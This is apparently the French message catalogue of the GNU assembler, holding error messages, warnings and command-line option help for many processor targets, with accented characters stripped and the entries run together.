%s: symboles globaux non supports dans les section communes%s: pas de telle section%s: la sortie de la 1ere instruction est la mme que l'entre de la 2e instruction - est-ce intentionnel ?%s: la sortie de la 2e instruction est la mme que l'entre de la 1ere instruction - est-ce intentionnel ?%s: temps total d'assemblage: %ld.%06ld
%s: type de fonction inattendu: %d%s: nom de processeur non reconnu%s:%u: retour erron de bfd_install_relocation: %x %s  n'est pas rptable. Comportement rsultant est indfini. %s : seule l'instruction NOP peut tre utilise en parallle sur le m32r')' requis [  attendu aprs la mnmonique PLD entry_num  doit tre un nombre absolu dans [0,31](PC)+ imprvisible(raison inconnue)*<abs8>-%s en conflit avec d'autres options d'architecture, lequel implique -%s-(PC) imprvisible--gstabs n'est pas support pour ia64--no-underscore est invalide pour une format a.out-32                       crer un fichier objet de 32 bits
-64                       crer un fichier objet de 64 bits
-32                       crer un fichier objet de o32 ABI
-n32                      crer un fichier objet de on32 ABI
-64                       crer un fichier objet de 64 ABI
-32 est support seulement pour le format ELF-64 est support seulement pour le format ELF-EL                       gnrer du code pour machine  octets de poids faible
-EB                       gnrer du code pour machine  octets de poids fort
--little-endian-data      gnrer du code pour machine ayant des instructions
                           octets de poids fort et des donnes  octets de poid faible
-G ne peut tre utilis avec du code PIC SVR4-G n         donnes >= n octets est une petite zone de donnes
-G n'est pas support dans cette configuration.-V                        afficher la version de l'assembleur
-undeclared-regs          ignorer l'utilisation d'un registre global sans
                          sans la directive .register (par dfaut)
-no-undeclared-regs       forcer les erreurs lors de l'utilisation d'un registre global
                          sans directive .register approprie
-q                        ignor
-Qy, -Qn                  ignor
-s                        ignor
L'option -R n'est pas supporte pour la cible.-TSO                      utiliser le Total Store Ordering
-PSO                      utiliser le Partial Store Ordering
-RMO                      utiliser le Relaxed Memory Ordering
-call_shared est support seulement pour le format ELF-expand-pt32 invalid ensemble avec -no-expand-expand-pt32 seulement valide avec -abi=64-k                        gnrer en PIC
-mCPU                   quivalent  -march=CPU -mtune=CPU. Dprci.
-no-mCPU                ne pas gnrer de code spcifique au CPU.
                        Pour -mCPU et -no-mCPU, CPU doit tre un des suivants:
-mPIC         noter le grand code indpendant de la position
-mabi est support seulement pour le format ELF-mcpu=<version CPU>       spcifier la version du CPU
-mdouble     noter que insns fp double sont utiliss
-mdword      noter que la pile est aligne sur une frontire de 8 octets
-me <nom-de-fichier>      rediriger les erreurs vers le fichier
-merrors-to-file <nom-de-fichier>
-mfar-mode | -mf          utiliser un adressage tendu
-mfpr-32     noter que frps 32 est utilis
-mfpr-64     noter que frps 64 est utilis
-mgp32 utilis avec un ABI de 64 bits-mgp64 utilis avec un ABI de 32 bits-mgp64 utilis avec un processeur de 32 bits-mgpr-32     noter que grps 32 est utilis
-mgpr-64     noter que grps 64 est utilis
-mips16                 gnrer des instructions mips16
-no-mips16              ne pas gnrer d'instructions mips16
-mlibrary-pic compiler la librairie pour du grand code indpendant de la position
-mmedia      noter que insns fp double sont utiliss
-mmuladd     noter que les insns multiplicatif add/sous sont utiliss
-mno-dword   noter que la pile est aligne sur une frontire de 4 octets
-mno-pack    ne pas empaqueter les instructions
-mpack       noter que les instructions sont empaquetes
-mpic         noter le petit code indpendant de la position
-mrelocatable            support pour l'option GCC -mrelocatble
-mrelocatable-lib        support l'option GCC -mrelocatble-lib
-memb                    initialiser le bit PPC_EMB dans les fanions ELF
-mlittle, -mlittle-endian
                         gnrer le code pour systme  octets de poids faible
-mbig, -mbig-endian      gnrer le code pour systme  octets de poids fort
-msolaris                gnrer le code pour Solaris
-mno-solaris             ne pas gnrer le code pour Solaris
-V                       afficher la version de l'assembleur
-Qy, -Qn                 ignor
-msoft-float noter que le fp logiciel est  utilis
-mtomcat-debug arrengements de dbug pour tomcat
-mtomcat-stats afficher les statistiques pour les arrangements pour tomcat
-n32 est support seulement pour le format ELF-no-expand valide seulement avec SHcompact ou SHmedia-no-mix est invalide sans spcification de SHcompact ou SHmedia-non_shared est support seulement pour le format ELF-shcompact-const-crange est invalide sans SHcompact...longueur de .COMMon (%d.) < 0! Ignor.longueur de .COMMon (%ld.) <0! ignor.longueur de .COMMon (%lu.) hors limite, ignor..EQU doit avoir une tiquette.EXIT doit apparatre  l'intrieur d'une procdureExpression .REG doit tre un registre.REG doit avoir une tiquettelongueur .SCOMMon (%ld.) <0! Ignor..abort dtect.  Abandon.Directive .begin sans concordance de directive .endDirective .begin sans directive .ent qui la prcdeDirective .begin sans directive .file qui la prcde.begin/.bend dans diffrents segmentsdirective .bend pour des noms de symbole inconnuDirective .bend sans directive .ent qui la prcdeDirective .bend sans directive .file qui la prcde.callinfo n'est pas  l'intrieur de la dfinition de procdure.cfi_endproc sans directive correspondante .cfi_startproc.cpload n'est pas dans la section  noreorder .def pseudo oprateur utilis  l'intrieur de .def/.endef: ignor.pseudo-op .def utilis en dehors de .def/.endef; ignor.dim pseudo oprateur utilis  l'extrieur de .def/.endef: ignor.pseudo-op .dim utilis en dehors de .def/.endef; ignor.ef n'est pas prcd de .functionDirective .end n'a pas de nomDirective .end manquante ou symbole inconnuDirective .end a un nom diffrent de symbole que .entdirective .end pour des noms de symbole inconnudirective .end sans directive .ent qui la prcdedirective .end n'est pas prcd de la directive .entdirective .end sans directive .file qui la prcdedirective .end sans concordance avec une directive .ent.end n'est pas dans la section de textesymbole .end n'est pas pair avec le symbole .ent.end%s n'est pas prcd de .%spseudo-op .endef utilis avant .def; ignor.endef pseudo oprateur utilis  l'extrieur de .def/.endef: ignor..endfunc manquant pour la dclartion .func prcdente.endfunc manquant pour la dclaration .proc prcdenteLa directive .ent n'a pas de nomDirective .ent n'a pas de symboledirective .ent sans concordance d'une directive .end.ent ou .aent n'est pas dans la section texte..err rencontr.es n'est pas prcd de .bs.fail %ld rencontrcompte .field  %d  hors limite (1 <= X <= 32)taille de .fill limite  %d..fmask en dehors de .ent.frame  l'extrieur de .ent.ifeqs erreur de syntaxe.incbin a un compte  zro,  %s  est ignor.linkonce n'est pas support pour ce format de fichier objet.literal_position  l'intrieur de la directive du litral; ignor.ln pseudo oprateur  l'intrieur de .def/.endef: ignor..loc avant .file.loc  l'extrieur de .text.loc pseudo oprateur  l'intrieur de .def/.endef: ignor..mask en dehors de .ent.mask/.fmask  l'extrieur de .entDirective .name n'a pas de symboleDirective .name n'est pas dans la section .link.option pic%d n'est pas supporteDirective .pdesc n'a pas de symbole d'entreDirective .pdesc n'est pas dans la section .link.pdesc n'est pas pair avec .ent.popsection sans directive correspondante .pushsection; ignor.previous sans directive correspondante .section; ignordirective .prologue sans directive .ent qui la prcde.sblock peut tre utilis pour des sections initialises seulement.scl pseudo oprateur utilis  l'extrieur de .def/.endef ignor.pseudo-op .scl utilis en dehors de .def/.endef; ignor.set pop sans .set pushexpression .size trop complique pour tenter de la corriger.size pseudo oprateur utilis  l'extrieur de .def/.endef ignor.pseudo-op .size utilis en dehors de .def/.endef; ignor.space ou .fill avec une valeur ngative, ignor.space compteur de rptition est ngatif, ignor.space compteur de rptition est zro, ignor.space spcifie une valeur non absoluecompte de rptition .space/.bes est ngatif, ignorcompte de rptition .space/.bes est zro, ignor.stab%c n'est pas support.stab%c: champ de description '%x' trop grand, essayer un format de dbug diffrent.stab%c: ignore les non zros dans autres champs.stab%c: virgule manquante.syntax %s requiert  l'option  --no-underscore .syntax %s requiert l'option  --underscore .tag pseudo oprateur utilis  l'extrieur de .def/.endef ignor.pseudo-op .tag utilis en dehors de .def/.endef; ignor.tag requiert une structure d'tiquette.tag cible  %s  qui est indfini.tc n'est pas dans la section .toc.tc sans tiquette.type pseudo  oprateur utilis  l'extrieur de .def/.endef ignor.pseudo-op .type utilis en dehors de .def/.endef; ignorDirective .usepv n'a pas de nomDirective .usepv n'a pas de type.uses ne rfre pas  un symbole local dans la mme sectionpseudo-op .uses a t vu alors pas de relaxationla cible .uses ne rfre pas  un symbole local dans la mme section.val pseudo  oprateur utilis  l'extrieur de .def/.endef ignor.pseudo-op .val utilis en dehors de .def/.endef; ignor.var ne peut tre utilis qu'avec une dfinition de macro.word %s-%s+%s ne fait pas0x%lx:  %s  type = %ld, classe = %d, segment = %d
saut de 16 bits hors limiteBranchement conditionnel 32 bits a t gnrmode 32 bits n'est pas support sur ce CPUchamp de 5 bits doit tre absoluimmdiate de 5 bits trop grandeRelocalisation 62 bits n'est pas encore implantemode 64 bits n'est pas support sur ce CPU68000 ou plus68010 ou plus68020 ou plus68040 et 68851 spcifis; instructions mmu peuvent tre assembles incorrectement: l'oprande relative au PC ne peut tre une constante: l'oprande TLS ne peut tre une constante: il n'y a que 32 registres F; [0-63]: il n'y a que 64 registres F; [0-63]: nombre asr doit tre entre 0 et 31: nombre asr doit tre entre 16 et 31: %asrN attendu: expresion ASI invalide: nom ASI invalide: numro ASI invalide: nom cpreg invalide: masque d'expression membar invalide: masque de nom membar invalide: masque du numro membar invalide: expression de fonction de pr-recherche invalide: nom de fonction de pr-recherche invalide: numro de fonction de pr-recherche invalide: mode siam invalide pour l'expression: numro du mode siam invalide: rd crit seulement sur registre d'tat auxiliaire: registre privilgi non reconnaissable: registre d'tat auxiliaire v9a non reconnaissable: registre d'tat auxiliaire v9a ou v9b non reconnaissable:b non permis; utilise par dfaut:w<abs><nom>	 assembler pour l'architecture <nom>'nom>	 assembler pour le CPU <nom><nom>	 assembler pour l'architecture FPU <nom><imm8>,X<tiquette><inconnu>Destination @local ou branchement @plt est trop loigne, %ld octetsUn nombre grand/flottant ne peut pas tre utilis comme dplacement: 0x%lx utilisUn dcalage de branchement requiert un alignement 0 MOD 4Un diffrent %s a dj t spcifi, est maintenant %sUn resgistre d'tat ou un nom de bit d'tat est requisAAARG -> relocalisation de constante non traiteADRL utilis pour un symbole qui n'est pas dfini dans le mme fichierregistre ARM attenduOptions AVR:
  -mmcu=[nom-avr] slectionner la variante du micro-contrleur
                   [nom-avr] peut tre:
                   avr1 - AT90S1200, ATtiny1x, ATtiny28
                   avr2 - AT90S2xxx, AT90S4xxx, AT90S8xxx, ATtiny22
                   avr3 - ATmega103, ATmega603
                   avr4 - ATmega83, ATmega85
                   avr5 - ATmega161, ATmega163, ATmega32, AT94K
                   ou un nom immdiat de micro-contrleur
abandon parce que la dclaration a "%s"Accs de `%s' comme un objet de thread localAccs de la fonction `%s' comme un objet thead localAjout d'un symbole non rsolu n'est pas sur une frontire de motMode d'adressage *+ARx n'est pas permis pour un mode d'adressage par registre  memory-mapped ,.  Comportement rsultant est indfini.Mode d'address *+ARx est en criture seulement. Rsultat dela lecture est indfini.Adresse de l'oprande immdaiteMode d'adressage pas encore implant.A ajust le dbordement sign de .word (%ld): option -statement trop grande.Alignement doit tre une puissance de 2Alignement ngatif: 0 assumAlignement ngatif: 0 assum.Alignement trop grand: %d assumAlignement trop grand: %d. assumAlignement trop grand: %d. assum.Options pour Alpha:
-32addr                 traiter les addresses comme des valeurs de 32 bits
-F                      suppler le manque de soutien des instructions en virgule flottante
-mev4 | -mev45 | -mev5 | -mev56 | -mpca56 | -mev6 | -mev67 | -mev68 | -mall
                        spcifier le type d'architecture Alpha
-m21064 | -m21066 | -m21164 | -m21164a | -m21164pc | -m21264 | -m 21264a | -m21264b
                        inclure les opcode PAL des variantes d'architecture
Une instruction a t tendu (%s)L'architecture ne concorde pas sur  %s .Argument pour .even ignorAssembleu be supporte pas encore PICMessages de l'assembleur:
chec d'assertion  %s ligne %d.
chec d'assertion dans %s  %s ligne %d.
Au moins un argument PR attenduAu moins deux arguments PR attendusTentative de placer un symbole commun dans l'ensemble %sTentative de placer le symbole indfini dans l'ensemble %sDcalage auto incrment/dcrment  %ld  est hors limite.BSPEC dj actif. Imbrication non supporte.BSPEC sans ESPEC.longueur BSS (%d.) <0 ignorlongueur BSS (%d.) <0! Ignor.Expression BYTE n'est pas un nombre purexpression BYTE n'est pas dans les bornes 0..255Directive .fmask erroneDirective .frame erroneDirective .frame errone paramtre 1./2.Directive .frame errone paramtre 3./4.Directive .mask erroneDirective .mask/.fmask erronedirective .section errone: a besoin de a,e,w,x,M,S,G,T dans la chaneDirective .section errone: ncessite a,o,s,w,x,M,S,G,T dans la chaneDirective .section errone: ncessite a,s,w,x,M,S,G,T dans la chaneVersion COFF erron  %s Version CPU errone  %s Registre de base erron, utilise $%d.Appel erron de MD_ATOF()Appel erron  MD_NTOF()Appel erron  md_atof ()Appel erron  md_atof() - format en virgule flottante n'est pas supportappel erron de md_atof()lment erron du slecteur %ldConstante en virgule flottante errone: %sTable de opcode errone, bris d'assemblageopcode-table-option erron, vrifier dans le fichier ns32k-opcode.hMauvaise oprandeOprande invalide pour une instruction de chargement (load):  %s Oprande errone pour une instruction de stockage:  %s mauvais nom de registre r%sGamme de registre erroneType de correctif de relocalisation erron (%d)Segement erron (doit tre absolu).Segment erron dans l'expression.Numro de squence erron: !%s!%sMauvais suffixe aprs  :  utiliser {b|w|d} par dfaut dSuffixe erron, utilise le dfaut dExpression d'adresse mal composeGrand nombre trop grandUn grand nombre n'est pas permis dans un litral  short . Mode immdiat assum.Grand nombre trop grand pour le format %c; tronquGrand nombre trop grand pour un  long Champ de bits hors limiteLes arguments ensembles doivent tre des symboles de substitution la fois the_insn.HI et the_insn.LO sont initialiss : %sBranchement %s est toujours vraiBranchement hors gammmeBranchement non align sur une adresseBris d'assemblage. Aucune tentative d'assemblage.opcode erron:  %s %s 
Options de la ligne de commande C54x-specific:
instruction CFI utilise sans tre prcd de .cfi_startprocVersion de CPU a dj t initialisOptions spcifiques CRIS:
Ne peut dplacer %d octets par %srelocalisationNe peut faire une relocalisation PIC relative au PC de %d octetsNe peut faire une relocalisation relative au PC de %d octetsNe peut faire une relocalisation de %d octets relatif au PC pour le stockage de type %dNe peut faire une relocalisation PIC de %d octetsNe peut faire une relocalisation de %d octetsNe peut faire une relocalisation de %d octets pour le stockage de type %dNe peut reprsenter la relocalisation %s dans ce format de fichier objetne peut initialiser dlx_skip_hi16_flagNe peut changes les espace  l'intrieur d'une dfinition de procdure. IgnorNe peut modifier des sous-espaces  l'intieur de la dfinitin d'une procdure. IgnorNe peut traiter l'expression; utilise par dfaut %ldNe peut utiliser un nombre flottant en literal  short : mode immdiat utilis.ne peut trouver le opcode pour concorder avec les oprandesNe peut traiter O_big dans s390_exp_compareNe peut adresser par hachage %s: %sNe peut adresser par hachage  %s : %s
Ne peut adresser par hachage l'instruction  %s :%sNe peut rediriger stderr vers le fichier  %s Ne peut relaxer la diffrencene peut relocaliser l'expressionNe peut initialiser une valeur GPNe peut initialiser les masques de registresNe peut utiliser une virgule flottante insn dans cette sectionNe peut traiter la taille de l'oprande.
Ne peut allouer un descripteur non tendu
Ne peut assembler l'instructionNe peut dfinit un symbole d'exportation: %s
Ne peut dfinir le symbole statique: %s
ne peut trouver le type de relocalisation pour le symbole %s, code %dNe peut gnrer un type de relocalisation pour le symbole %s, code %sNe peut traiter le correctifNe peut faire une relocalisation %s relative au PCNe peut reprsenter le type de relocalisation %sCasse inattendue valeur %ld  la ligne %d du fichier  %s 
Changement de version de CPU  la vole n'est pas supportChoisir une valeur GP de %lx
Virgule et symbole attendus pour '.asg CHANE, SYMBOLE'Virgule et symbole attendus pour '.eval EXPR, SYMBOLE'Virgule attenduAlignement ngative du commun; 0 est assumAlignement du commun n'est pas une puissance de 2expressions complexes ne sont pas supportesCondition  %s  ne concorde pas avec le groupe prcdentCondition  %s  utilise un accumulateur diffrent de la condition prcdentecondition <%c%c> dans la directive de contrle structure ne peut tre encode correctementCode du coproccesseur > 25 bits (%lu)Ne peut initialiser l'architecture et la machineSection courante n'est pas initialise, nom de section requis pour .clinkOptions D10V:
-O                      Optimiser.  Certaines oprations seont faites en parallle.
--gstabs-packing        empaqueter les instructions adjacentes short ensembles mne
                        lorsque --gstabs est spcifi.  Activ par dfaut.
--no-gstabs-packing     Si --gstabs est spcifi, ne pas empaqueter les instructions
                        adjacentes ensembles.
Cible de dfaut  %s  n'est pas supporte.Assembleur dfectueux. Aucune tentative d'assemblage.syntaxe dprcieAccumulateur Destination accumulator for each part of this parallel instruction must be differentDirective invalide  l'intrieur du paquetLa longueur de dplacement %s est ignor!Division par zro.Ne sait pas comment mesurer la largueur de %c dans md_assemble()Conditionnel %s dupliquPrdicat de registre en double ignorLes constantes EBCDIC ne sont pas supportes.Mise au point de ECOFF est dsactive.ENDLOOP sans LOOP correspondantESPEC sans tre prcd de BSPECERREUR %s dans %s
ERREUR dans le traitement de la relocalisationERREUR:ERREUR: Nombre pair requis. Arrondi  %dExcuter %s dans IU en ordre sriel inverse peut ne pas fonctionnerExcution de %s dans IU peut ne pas fonctionnerExcution de %s dans IU peut ne pas fonctionner lors d'une excution en parallleExcuter %s en ordre sriel inverse avec %s peut ne pas fonctionneropcode tendu aprs un branchement retard:  %s Expansion du opcode en mode dual:  %s Virgule attendue aprs la longueur du communVirgule attendue aprs le nomVirgule attendue aprs le nom  %s Virgule attendue aprs un nom de symboleVirgule attendue aprs le nomde symbole: reste de la ligne ignor.chane mise en commentaire attendueAttendu  ]  trouv  %s Registre attendu.Attendu un argument contenant une constante caractreRegistre D attendu en mode index indirect.Second argument attenduLes arrts explicites sont ignors en mode autoERREUR d'expression pour le modificateur d'oprande %%hi/%%lo
Expression hors limite, utilise 0Expression trop complexe.Adressage tendu n'est pas supporte sur le CPU spcifi) superflueRebut superflu dans l'appel de fonction,   )  attenduFIRST n'est pas support comme un argument pour .SUBSPACEbranchement FP dans une plage de dlaibranchement FP prcd par une instruction FP; NOP insrregistre FPA attenduParamtre FRAME doit tre un multiple de 8: %d
Options spcifiques FRV de la ligne de commande:
ERREUR fatale: Champ incorrectement allign [%d] (%d).Champ hors limite [%d..%d] (%d).Fichier  %s  n'est pas en format d'archive macroLe 1er opcode est long.  Incapable de mlanger des instructions tel que spcifi.Correctif de %ld trop grand pour la largeur du champ de %dRegistre de virgule flottante dervait tre pair, tait %dRegistre en virgule flottante est dans la liste de registresForc le litral  short  en mode immdiat. now_seg=%s  _seg=%sA forc un dplacement d'octetTrouv  {  aprs un passage explicite en mode automatiqueLa fonction espre deux argumentsAssembleur GNU %s
GOT est dj dans la table de symbolestaille du prologue GP excde la taille du champ, utilise 0  la placeexpression GREG trop complexeRebut  la fin d'instruction:  %s .chec de GAS, valeur de relocalisation %d
La fonction de hachage a retourn  %s .Registres systmes des valeurs hautes ne peuvent tre inclus dans la listeN'ai pas besoin ni n'utilise de fichier temporaire  %s .Un fichier d'inter-passe ne peut tre utilis! -V ignorOptions I960:
INSTR_LABEL_DEF n'est pas support encoreoptions IP2K spcifique de la ligne de commande:
L'instruction IU ne peut pas tre laiss dans le conteneur de gaucheTentative ignore de re-dfinition de symboleTentative ignore de re-dfinition du symbole  %s .A ignor les attributs de section modifis pour %sDclaration ignore en raison de  %s Instruction illgale ou opcode non implant.Code 19 bits illgal (%lu)oprande illgaleoprandes illgalesoprandes illgales pour %sOprande %s illgaleOprandes illgales: %%%s ne peut tre utiliss seulement avec call __tls_get_addrOprandes illgales: %%%s ne peut tre utiliser ensemble avec d'autres relocalisations dans insn ()Oprandes illgales: %%%s requiert des arguments dans ()Oprandes illgales: %%r_%s%d requiert des arguments dans ()Oprandes illgales: %%r_plt dans %d-octet de champ de donnesOprandes illgales: %%r_tls_dtpoff dans %d-octet du champ de donnesOprandes illgales: ne ajouter des expressions qui ne sont pas des constantes  %%%s()Oprandes illgales: ne peut faire de l'arithmtique impliquant %%%s() un symbole relocalisableOprandes illgales: ne peut faire de l'arithmtique autre que + et - impliquant %%%s()Oprandes illgales: seulement %%r_%s%d permis dans %d-octets de champ de donnesoprandes illgales: rebuts aprs %%r_%s%d()L'oprande immdiate n'est pas permise pour l'oprande %d.Valeur immdiate n'est pas dans les bornes non signes de 16 bits: %ldValeur immdiate n'est pas dans les bornes non signes de 4 bits: %ldValeur immdiate n'est pas dans les bornes non signes de 5 bits: %ldValeur immdiate n'est pas dans les bornes non signes de 6 bits: %ldValeur immdiate n'est pas dans les bornes non signes de 6 bits: %ldValeur immdiate n'est pas dans les bornes non signes de 8 bits: %ldTaille d'extraction incorrecte (%lu, position %lu)Taille d'insertion incorrecte (%lu, position %lu)Position errone (%lu)Nombre de rotations erronNombre de dcalages erron (%lu)Valeur d'incrmentation/dcrmentation est hors limite:  %ld .Mode index indirect n'est pas permis pour movb/movw.L'adressage indirect index n'est pas valide pour 68HC11.Insertion de  %s  dans la table d'indices a chou: %sInsertion de  %s  dans la table de structure a chou: %sInstruction %s n'est pas permise dans la plage de dlaiInstruction %s requiert une expression absolueInstruction %s: rsultat est toujours fauxInstruction %s: rsultat est toujours vraiL'instruction  %s  requiert une version LP de CPUL'instruction  %s  requiert une mode d'adressage lignInstruction  %s  n'est pas reconnue.Instruction peut ne pas s'insrer dans des plages de dlai (%d-mots insn, %d plages de gauche)Instruction ne s'insre pas dans les plages de dlai disponibles (%d-mots insn, %d plages de gauche). Comportement rsultant est indfini.Formats d'instruction pour  %s :Instruction dans le conteneur R est cras par une instruction de contrle de flux
du conteneur L.L'instruction doit tre excute en parallleL'instruction doit tre excute en parallle avec une autre.L'instruction utilise une version avec long, aussi elle ne peut tre mlange tel que spcifiLes instructions n'utilisent pas de pipelines parallles durant l'excution.Les instructions ne peuvent pas tre excutes en parallleLes instructions partagent le mme pipeline durant l'excutionLes instructions utilisant des modificateur de dcalage long ou des adresses absolues ne sont pas rptables. Comportement rsultant est indfini.Les instructions qui causent une discontinuit du PC ne sont pas permises dans une plage de dlai.
Comportement rsultant est indfini.ERREUR interne: ne peut adresser par hachage %s: %sERREUR interne: ne peut reprer %s dans la table de hachageERREUR interne: ne peut adresser par hachage %s: %serreur interne d'assembleur pour l'instruction %serreur interne d'assembleur pour le format d'instruction %sProblme interne. Essayer d'utiliser 0(r%d) au lieu de @r%dERREUR de consistence interne. Vrifier ns32k-opcode.hERREUR interne!
ERREUR interne, abandon  %s ligne %d
ERREUR interne, abandon  %s ligne %d dans %s
ERREUR interne: incapable de reprer l'espace contenu pour  %s.ERREUR interne: ne peut trouver le opcode  %s pour %s 
ERREUR interne: ne peut adresser par hachage  %s : %s
ERREUR interne: perte du opcode  %s %s 
ERREUR de logique interne dans iif.iifP[].typeERREUR de logique interne dans iif.iifP[].typeERREUR de logique interne.  ligne %d, fichier "%s"ERREUR de logique interne.  ligne %d, fichier "%s"Argument invalide .CALL: %sArgument  .CALLINFO invalide: %sArgument .SPACE invalideargument .SUBSPACE invallideformat .insn invalide
Condition d'addition invalide: %sCondition d'addition et de branchement invalideCondition de bit de branchement invalide: %cIdentificateur COPR invalideCondition comparaison et de branchement invalideCondition comparaison/soustraction invalideCondition comparaison/soustraction invalide: %sexpresion d'tiquette de donnes  invalideCondition de comparaison FP invalide: %sFormat d'oprande FP invalide: %3sComplteur FTEST invalise: %sFormat d'oprande en virgule flottante invalide.Syntaxe de complteur de chargement index invalide.Complteur de chargement index invalide.Instruction de condition logique invalide.immdiat MDMX invalide (%ld)Nullification invalide: (%c)expresion PIC invalideIdentificateur SFU invalideCondition dcalage/extraction/dpot invalide.Short Load/Store Completer invalide.Store Bytes Short Completer invalideInstruction unaire (Unit) de condition invalide.Registre accumulateur invalide.argument invalide %d pour .prologueDescription invalide de l'argument: %dLocalisation invalide de l'argument: %s
Argument invalide vers .abi: %sargument invalide pour .mode: %sRegistre auxiliaire invalide (utiliser AR0-AR7)Combinaison invalide: --abi=32 avec --abi=64Combinaison invalide: --abi=64 avec --abi=32Combinaison invalide: --abi=64 avec --isa=SHcompactCombinaison invalide: --isa=SHcompact avec --abi=64Combinaison invalide: --isa=SHcompact avec --isa=SHmediaCombinaison invalide: --isa=SHmedia avec --isa=SHcompactArchitecture par dfaut invalide, bris d'assemblage.Registre de destination invalide pour cette instruction, utiliser  tfr .Registre de destination invalide.Syntaxe dmad invalide  %s expression invalide aprs # numro
expression invalide aprs %%%%
Slecteur de champ invalide. F%% assum.Taille de champ invalide, doit tre de 1  32.Oprande invalide immdiate d'critureMode index indirect invalide.Registre d'index invalide, registre X attendu.Registre d'index invalide, registre Y attendu.Registre index invalide.tiquette invalide  %s Combinaison de complteur left/right invalideLongueur invalide (utiliser 0  %d)Mnmonique invalide  %s mode invalide: %s
opcode/oprande invalideOprande invalide (s) pour une instruction parallle  %s Oprande invalide (utiiser 1, 2, ou 3)oprande invalide dans l'expressionOprande invalide pour  %s Oprande invalide: valeur immdiate utilise comme adresseOprande invalide: valeur immdiate utilise comme adresse de baseoprandes invalides %sMode d'adresse invalide ou illgal combin avec un index-chellerelocalisation relative du PC invalideregistre de performance invalide (%lu)Permutation de complteur invalideRegistre invalide pour un instruction dbcc/tbcc.Registre invalide pour un post/pr incrmentation.Registre invalide pour la prcision simple fmpyadd ou fmpysubListe de registres invalide pour ldm/stm
numro de registre invalide (%d)Spcification de registre invalide.Registre invalide.registre invalide: 'r%d'registre invalide: r0 et r15 illgauxRelocalisation invalideMode index-chelle invalide, utilise b, w, d ou qRegistre source invalide pour cette instruction, utiliser  tfr .Registre source invalide.Registre d'tat invalide  %s Sous-script invalide (utilise 1  %d)Suffixe invalide pour le bassin d'entres litralesSyntaxe invalide en mode d'adressage externeSyntaxe invalide dans le mode d'adressage relatif en mmoireSyntaxe invalide en mode d'adressage relatif au PCValeur invalide pour  %s  (%lu)Noms MCU connus:Noms MCU connus:
expression LOC avec pas arrire n'est pas supportetiquette requise pour .taglongueur de .comm  %s  est dj %ld. N'a pas t modifi  %d.Longueur de .comm  %s  est dj %ld. N'a pas t chang pour %ld.Longueur de .lcomm  %s  est dj %ld. N'a pas t chang  %ld.Longueur de .scomm  %s  est dj %ld. N'a pas t chang  %ld.Spcification de longueur ignore. Mode d'adressage 9F utilisLigne %d: type de relocalisation inconnu: 0x%xLes numros de lignes doit tre des entiers positifs
Les instructions longues ne peuvent pas tre combines.Ressemble  une procdure, mais ne peut dire de quel genre.
Bits du bas tronque dans l'oprande flottante immdateopcode spcifique M340 utilis lors de l'assemblage pour M210Options spcifiques MCORE:
  -{no-}jsri2bsr	   {d}activer la conversion jsri en bsr (par dfaut: no)
  -{no-}sifilter	   {d}activer le comportement du filtre de silicon (par dfaut: no)
  -cpu=[210|340]     slectionner le type de CPU
  -EB                assembler pour un systme  octets de poids fort (par dfaut)
  -EL                assembler pour un systme  octets de poids faible
Appel PIC MIPS  un registre autre que $25Options MN10200:
aucune pour l'instant
oprande MOVI n'est pas une valeur signe de 32 bits: 0x%8x%08xpseudo-op MRI de style ORG n'est pas supportMSP430 n'a pas de registres %dL'instruction MU ne peut pas tre dans le conteneur de droiteMacro %s n'est pas implant encoreInstruction macro tendue en de multiples instructionstendre l'instruction macro en de multiples instructions dans un branchement avec dlaiMacro utilise $at aprs ".set noat"registre Maverick DSPSC attenduregistre Maverick MVAX attenduregistre Maverick MVD attenduregistre Maverick MVF attenduregistre Maverick MVFX attenduRegistre de projection mmoire  %s  hors limite.entry mal positionn. Ignor. (  manquante aprs la fonction de substitution de symbole )  manquant dans l'expression de symbole de substituttion sous-scripte) manquante) manquant dans ra(rb).EXIT manquant pour un .ENTRY.callinfo manquant.callinfo manquant pour cette procdure.callinfo manquant..exit manquant
.procend manquant
 ]  manquant pour complter le mode index-indirect. ]  manquant pour complter l'oprande de registre indirect.arguments manquants pour le opcode  %s Terminateur forc de substitution manquant  : Nom de fonction mauqnat pour .PROCNom de fonction manquant pour .PROC (chane d'tiquette corrompue)Nom d'tiquette manquant pour .LABELOprande manquanteOprande manquanteType de relation de prdicact manquantSecond registre manquant pour le mode index-indirect.Second registre ou dcalage pour le mode index-indirect manquant.Argument pour la taille est manquantMlange d'adressage normal et tendu n'est pas supportPlus d'un oprateur de relocalisation par insnDoit tre dans un espace avant de changer ou dclarer des sous-espaces.
Options NS32K:
-m32032 | -m32532          slectionner la variante d'architecture NS32K
--disp-size-default=<1|2|4>
Nom    # Modes  Min ops  Max ops  Modes masq. # Utilis
A besoin de #1 ou #2 iciAucun de opcode Power ou PowerPC n'a t slectionn.Procdure imbriquesAucun !literal!%ld n'a t retrouvAucun !tlsgd!%ld n'a t retrouvAucun !tlsldm!%ld n'a t retrouvPas de point d'entre  bal  pour la procdure leafproc %sPas de .ENTRY pour ce .EXITPas de pseudo-op .cprestore utilis dans le code PICPas de pseudo-op .frame utilis dans le code PICPas de virgule aprs .pdesc <entryname>N'est pas compil pour le support de format de fichier objet de %d bitsPas compil pour le support de format de fichier objet de 64 bitsPas compil pour le support pour x86_64Pas d'instruction ou opcode manquant.Aucun lda !gpdisp!%ld n'a t retrouvAucun ldah !gpdisp!%ld n'a t retrouvPas de mmoire pour le nom de symbole.Pas d'oprateurPas de section prcdente pour y retourner. Directive ignore.Pas d'oprande de relocalisationPas d'info de segment pour la section courantePas de telle entre dans la liste. (registre cpu/mmu)Pas de tel opcodePas de symbole aprs .code_addressPas de symbole aprs .linkageSymbole non absolu:  %s .Pas assez d'oprandesN'est pas dans l'espace.
N'est pas dans le sous-espace.
